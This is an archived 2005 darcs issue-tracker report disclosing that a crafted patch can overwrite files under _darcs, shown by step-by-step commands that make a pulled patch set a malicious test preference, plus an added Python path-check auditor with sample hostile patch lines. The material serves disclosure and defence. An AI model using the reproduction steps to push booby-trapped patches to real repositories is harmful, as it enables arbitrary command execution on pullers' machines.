[darcs-devel] [issue48] malicious patch can alter darcs preferences!

Nils Decker bugs at darcs.net
Tue Dec 6 11:39:37 PST 2005


New submission from Nils Decker <darcs at ndecker.de>:

It is possible to create a patch that overwrites any file in _darcs. This can be
used to execute arbitrary commands, for example by overwriting the test setpref.

Create malicious patch:
cd a
darcs init
darcs setpref test malicious
mkdir test
touch test/x
darcs add test/x
edit _darcs/patches/pending:
  - remove setpref
  - change adddir and addfile to _darcs/prefs/prefs
darcs rec --no-test

Use patch:
cd b
darcs init
darcs setpref test safe
darcs pull ../a
cat _darcs/prefs/prefs
 > test malicious


darcs -v
1.0.3 (release)
( debian testing )

----------
messages: 178
nosy: droundy, ndecker, tommy
priority: urgent
status: unread
title: malicious patch can alter darcs preferences!

____________________________________
Darcs issue tracker <bugs at darcs.net>
<http://bugs.darcs.net/issue48>
____________________________________
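
The report above comes down to a missing path check when a pulled patch is applied: adddir and addfile were accepted for targets under _darcs. The following is an added example, not code from the report or from darcs, of the kind of check a patch applier can run before touching the working tree. The one-operation-per-line "op path" format, the operation names other than adddir and addfile, and all function names are assumptions made for illustration.

```python
import posixpath

PROTECTED_DIR = "_darcs"  # metadata directory the report shows being overwritten
# Assumed, simplified op names; adddir/addfile are the two named in the report.
# The value is the number of path arguments that follow the op.
PATH_OPS = {"adddir": 1, "addfile": 1, "rmdir": 1, "rmfile": 1, "hunk": 1, "move": 2}

def resolve(path):
    """Normalize a repo-relative path; None means it leaves the working tree."""
    p = posixpath.normpath(path.replace("\\", "/"))
    if p.startswith("/") or p == ".." or p.startswith("../"):
        return None
    return p

def is_forbidden(path):
    """True if the path escapes the tree or lands inside the metadata directory."""
    p = resolve(path)
    if p is None:
        return True
    # Compare case-insensitively so _DARCS is caught on case-folding filesystems.
    return p.split("/", 1)[0].lower() == PROTECTED_DIR

def audit_patch(text):
    """Return (line_number, op, path) for every path argument that must be refused."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        tokens = line.split()
        if not tokens or tokens[0] not in PATH_OPS:
            continue
        for path in tokens[1:1 + PATH_OPS[tokens[0]]]:
            if is_forbidden(path):
                findings.append((lineno, tokens[0], path))
    return findings

# Constructed sample, not a real darcs patch file.
SAMPLE = """\
adddir ./test
addfile ./test/x
adddir ./_darcs/prefs
addfile ./_darcs/prefs/prefs
addfile ./test/../_darcs/prefs/prefs
move ./test/x ./_DARCS/prefs/prefs
"""

if __name__ == "__main__":
    for lineno, op, path in audit_patch(SAMPLE):
        print(f"line {lineno}: refuse {op} {path}")
```

The check normalizes before comparing, so a target written as ./test/../_darcs/prefs/prefs is refused the same way as ./_darcs/prefs/prefs.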



